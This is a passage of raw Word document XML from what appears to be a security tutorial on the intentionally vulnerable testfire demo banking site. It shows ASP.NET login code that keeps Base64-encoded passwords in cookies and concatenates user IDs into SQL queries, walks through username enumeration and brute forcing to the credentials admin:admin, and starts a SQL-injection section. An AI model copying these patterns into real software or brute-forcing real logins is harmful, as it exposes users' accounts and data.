                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">          Session["userName"] = myRow["username"];</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">          Session["firstName"] = myRow["first_name"];</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">          Session["lastName"] = myRow["last_name"];</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">          Session["authenticated"] = true;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">          //Close the database collection.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">          myConnection.Close();</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">          //Set UserInfo cookie</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">          DateTime dtNow = DateTime.Now;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">          TimeSpan tsHour = new TimeSpan(0, 0, 180, 0);</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">          string sCookieUser = new Base64Decoder(uName).GetDecoded();</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">          HttpCookie UserInfo = Request.Cookies["amUserInfo"];</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">          if ((UserInfo == null) || (sCookieUser != Session["userName"].ToString()))</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UserInfo = new HttpCookie("amUserInfo");</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">              UserInfo["UserName"] = new Base64Encoder(uName).GetEncoded();</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">              UserInfo["Password"] = new Base64Encoder(pWord).GetEncoded();</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">              UserInfo.Expires = dtNow.Add(tsHour);</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">              Response.Cookies.Add(UserInfo);</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HttpCookie UserId = Request.Cookies["amUserId"];</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">          UserId = new HttpCookie("amUserId");</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">          UserId.Value = Session["userId"].ToString();</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">          Response.Cookies.Add(UserId);</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">          query1 = "SELECT userid, approved, card_type,interest, limit FROM promo WHERE userid=" + Session["userId"];</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">          OleDbDataAdapter myApproval = new OleDbDataAdapter(query1, myConnection);</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">          myApproval.Fill(ds, "promo");</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">          DataTable myTable = ds.Tables["promo"];</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">          DataRow curRow = myTable.Rows[0];</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">          if (System.Convert.ToBoolean(curRow["approved"]))</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HttpCookie CreditOffer = Request.Cookies["amCreditOffer"];</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">                CreditOffer = new HttpCookie("amCreditOffer");</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">            CreditOffer["CardType"] = curRow["card_type"].ToString();</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">            CreditOffer["Limit"] = curRow["limit"].ToString();</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">            CreditOffer["Interest"] = curRow["interest"].ToString();</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">                Response.Cookies.Add(CreditOffer);</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myConnection.Close();</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">      return status;</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protected string GetUserName()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HttpCookie UserInfo = Request.Cookies["amUserInfo"];</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">          if (Request.Params["uid"] != null)</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return Request.Params["uid"].ToString();</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if (UserInfo != null)</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return new Base64Decoder(UserInfo["UserName"]).GetDecoded();</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else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return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#region Web Form Designer generated code</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">    override protected void OnInit(EventArgs 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 CODEGEN: This call is required by the ASP.NET Web Form Designer.</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InitializeComponent();</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">      base.OnInit(e);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 &lt;summary&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">    /// Required method for Designer support - do not modify</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">    /// the contents of this method with the code editor.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">    /// &lt;/summary&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">    private void InitializeComponent()</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#endregion</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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:after="257" w:before="257"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Semibold" w:eastAsia="Source Sans Pro Semibold" w:hAnsi="Source Sans Pro Semibold" w:cs="Source Sans Pro Semibold"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="25"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Brute force vulnerability</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="16" w:name="_Tocs6vpcmsc0n1e"/>
      <w:bookmarkEnd w:id="16"/>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Before we investigate the code, let’s have a look at a much common vulnerability. Go to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText>HYPERLINK "http://demo.testfire.net/bank/login.aspx"</w:instrText>
        <w:fldChar w:fldCharType="separate"/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>http://demo.testfire.net/bank/login.aspx</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> and use a random user for the login process. You’ll get:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="227860"/>
        <w:tblW w:w="9780" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="329"/>
        <w:gridCol w:w="9450"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="871"/>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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="945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Login Failed: We're sorry, but this username was not found in our system. Please try again.</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You could now easily </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Bold" w:eastAsia="Source Sans Pro Bold" w:hAnsi="Source Sans Pro Bold" w:cs="Source Sans Pro Bold"/>
          <w:b w:val="true"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>bruteforce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> common usernames in order to login into the application. The same works with passwords too: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:i w:val="true"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> seems to be a valid username. Try to bruteforce the password and you’ll get:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="762931"/>
        <w:tblW w:w="9780" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="329"/>
        <w:gridCol w:w="9450"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="871"/>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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="945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Login Failed: Your password appears to be invalid. Please re-enter your password carefully.</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i w:val="true"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>admin:admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a valid username/password combination.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:after="257" w:before="257"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Semibold" w:eastAsia="Source Sans Pro Semibold" w:hAnsi="Source Sans Pro Semibold" w:cs="Source Sans Pro Semibold"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="25"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>SQL injection using POST parameters</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="17" w:name="_Tochm6c5eobmp0m"/>
      <w:bookmarkEnd w:id="17"/>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Now let’s have a closer look at the source code… Let’s analyze the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:i w:val="true"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>!ValidateUser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>function:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="795436"/>
        <w:tblW w:w="12389" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="434"/>
        <w:gridCol w:w="11954"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="4839"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="434"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 xml:space="preserve"> 1</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
